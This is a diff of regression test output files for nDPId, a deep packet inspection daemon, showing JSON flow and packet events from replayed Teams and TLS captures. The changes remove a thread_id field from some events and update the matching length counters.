00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
@@ -487,21 +487,21 @@
00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2690,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1587041695435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2690,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1587041695435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2696,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMZh4AAEARkejAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2696,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMZh4AAEARkejAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="}
00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMyucAAEARLR\/AqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1587041695586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695586,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMyucAAEARLR\/AqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2699,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041695591,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2699,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041695591,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2699,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041695611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2699,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041695611}
00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2701,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1587041695890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695890,"pkt":"EBMx8Tl2KDc3AG3ICABFAACM6boAAEARDkzAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2701,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1587041695890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695890,"pkt":"EBMx8Tl2KDc3AG3ICABFAACM6boAAEARDkzAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="}
00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1587041695890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695890,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMMbQAAEARxlLAqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1587041695890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695890,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMMbQAAEARxlLAqAEGwKgABMN0w2QAeBWjAAEAXCESpEJMnOcpR8XuRjfgdwcABgAJSkZ3ajorbUl2AAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUZBvpMZrPL2uguq2xDA1A6CBjF+2AKAAEncV\/3g=="}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2715,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041696574,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2715,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041696574,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2715,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041696611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2715,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041696611}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697061,"flow_last_seen":1587041697061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041697061,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697061,"flow_last_seen":1587041697061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041697061,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1587041697061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041697061,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyYAbtVmTcwAAAAALAC\/\/8wcwAAAgQFtAEDAwUBAQgKMITmwQAAAAAEAgAA"} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1587041697061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041697061,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyYAbtVmTcwAAAAALAC\/\/8wcwAAAgQFtAEDAwUBAQgKMITmwQAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1587041697091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041697091,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8X+VAAG4GOLAoT4opwKgBBgG77Jhhqm+9VZk3MaASIADeAQAAAgQFoAEDAwgEAggKC\/ZmGDCE5sE="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1587041697091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041697091,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8X+VAAG4GOLAoT4opwKgBBgG77Jhhqm+9VZk3MaASIADeAQAAAgQFoAEDAwgEAggKC\/ZmGDCE5sE="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1587041697091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041697091,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyYAbtVmTcxYapvvoAQEAkclQAAAQEICjCE5t4L9mYY"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1587041697091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041697091,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyYAbtVmTcxYapvvoAQEAkclQAAAQEICjCE5t4L9mYY"}
00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
00372{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041697244,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041697244,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041697412} 00185{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041697412}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041697604,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041697604,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041697611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041697611}
00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1587041697660,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1587041697660,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA40fgAADUBJWpdR27NwKgBBgMDcCsAAAAARQAASh2AAAAyEd1gwKgBBl1Hbs3DdD\/NADaJWQ=="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1587041697660,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1587041697660,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA40fgAADUBJWpdR27NwKgBBgMDcCsAAAAARQAASh2AAAAyEd1gwKgBBl1Hbs3DdD\/NADaJWQ=="}
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296}
@@ -607,6 +607,6 @@
~~ total memory freed........: 6079029 bytes ~~ total memory freed........: 6079029 bytes
~~ total allocations/frees...: 104609/104609 ~~ total allocations/frees...: 104609/104609
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 198 chars ~~ json string min len.......: 184 chars
~~ json string max len.......: 1949 chars ~~ json string max len.......: 1949 chars
~~ json string avg len.......: 1073 chars ~~ json string avg len.......: 1066 chars

20
test/results/tls_invalid_reads.pcap.out
View File

@@ -2,8 +2,8 @@
00475{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1252380859868} 00475{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1252380859868}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1252380859868,"flow_last_seen":1252380859868,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1252380859868,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1252380859868,"flow_last_seen":1252380859868,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1252380859868,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1252380859868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1252380859868,"pkt":"ABTRQblQABy\/OaVJCABFAAA0MFlAAIAG8ynAqAplziE9cQ9\/AbtzVLVxAAAAAIAC+vBjhwAAAgQFtAEDAwABAQQC"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1252380859868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1252380859868,"pkt":"ABTRQblQABy\/OaVJCABFAAA0MFlAAIAG8ynAqAplziE9cQ9\/AbtzVLVxAAAAAIAC+vBjhwAAAgQFtAEDAwABAQQC"}
